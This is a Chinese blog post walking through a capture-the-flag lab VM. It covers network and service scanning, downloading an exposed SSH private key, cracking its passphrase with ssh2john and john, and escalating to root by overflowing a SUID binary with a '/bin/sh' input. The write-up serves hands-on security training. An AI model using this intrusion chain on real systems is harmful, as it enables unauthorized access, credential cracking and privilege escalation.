• 秘钥泄露(使用kali得到密码)


    搭建环境

    真机安装

    python环境(python-IDE)

    java环境(java-IDE)

    PHP环境(phpstudy)

    火狐浏览器延长支持板(需要安装HackBar扩展插件)

    notepad++

    虚拟机安装

    kali linux

    Win10(CFT工具包,为防止有后门不安装在真机)

    秘钥泄露

    kali

    1.探测靶场ip
    sudo netdiscover -r 192.168.101.1/24
    (因为我本机ip是192.168.101.43,所以要探测这个网段的ip)
    
    1.1同样也可以扫描ip地址
    sudo nmap -sn 192.168.101.1/24
    
    
    2.测试连通性
    ping 192.168.101.22
    
    3.挖掘开放服务信息
    sudo nmap -sV 192.168.101.45
    
    4.探测端口,获取有用的信息
    在kali中打开浏览器输入192.168.101.45:31337
    没有得到有用的信息,然后查看源代码
    
    5.探测是否有隐藏的文件或信息
    dirb http://192.168.101.45:31337
    (robots.txt:存放着允许探测的键名以及不允许被探测的键名)
    
    如果有robots.txt文件,则访问这个界面:http://192.168.101.45:31337/robost)
    随后发现有三个地址(文件),访问taxes这个界面,然后看到第一个flag      
    (flag: flag1{make_america_great_again})
    
    随后在访问.ssh这个文件来获取更多的信息,访问.ssh得到['id_rsa', 'authorized_keys', 'id_rsa.pub']
    然后访问id_rsa:
    http://192.168.101.45:31337/.ssh/id_rsa
    会让下载私钥
    然后再访问http://192.168.101.45:31337/.ssh/authorized_keys
    同样让下载文件
    最后下载公钥
    http://192.168.101.45:31337/.ssh/id_rsa.pub
    
    6.开始尝试登录ssh
    首先要切换到桌面
    cd Desktop/
    (如果下载的三个文件没有可读可写的权限,那就要先赋予权限 chmod 600 id_rsa.pub   权限过多或不足都会有影响)
    
    
    开始尝试登录
    在authorized_keys文件的最后可以看到simon@covfefe,simon就是用户名
    然后使用命令(id_rsa是私钥)
    ssh -i id_rsa simon@192.168.101.45
    连接之后不知道密码,只能更进一步的探测
    在id_rsa中有一串秘钥,可以使用工具ssh2john来进行转换,使jhon能够识别
    ssh2john id_rsa > rsacrack
    (将转换后的信息保存在rsacrack文件中)
    (需要安装ssh2john:sudo apt install john-data)
    然后利用字典解密rsacrack信息
    zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacrack 
    破解后就会看到密码,然后再重新ssh连接192.168.101.45
    ssh -i id_rsa simon@192.168.101.45
    然后输入密码starwars进入到192.168.101.45这台机器中
    (但是simon并不是root用户,只是一个普通用户)
    
    提升权限
    查找具有root权限的文件
    find / -perm -4000 2>/dev/null
    会看到一个read_message文件,查看文件的信息后,执行read_message这个文件,然后再输入正确的命令SimonAAA会进入到这个文件中
    再次执行read_message这个文件,这次输入SimonAAAAAAAAAAAAAAA/bin/sh会进入到root目录下
    然后查看flag.txt这个文件,会得到第二个flag,同时,在read_message.c中会得到第三个flag
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50
    • 51
    • 52
    • 53
    • 54
    • 55
    • 56
    • 57
    • 58
    • 59
    • 60
    • 61
    • 62
    • 63

    文章也是根据课程视频练习的,需要的可以私信

  • 相关阅读:
    Vue练习CRUD
    CocosCreator 面试题(八)Cocos Creator 中如何做资源管理
    python--numpy常用属性及方法
    【蓝桥杯06】:给定小明的城堡图,请问,水的高度依次为1,2,3,....,H时,有多少块积木要被水淹。
    Autosar深入-MPU
    AGI STK使用本地地形和地图
    Vue2.0开发之——Vue基础用法-列表渲染指令(24)
    linux取证——基础取证命令集合
    [Lua][Love] 有效碰撞处理の类别与位掩码 | fixture:setFilterData
    --JVM调优参数设置 --jvm垃圾回收器
  • 原文地址:https://blog.csdn.net/weixin_44774550/article/details/132969823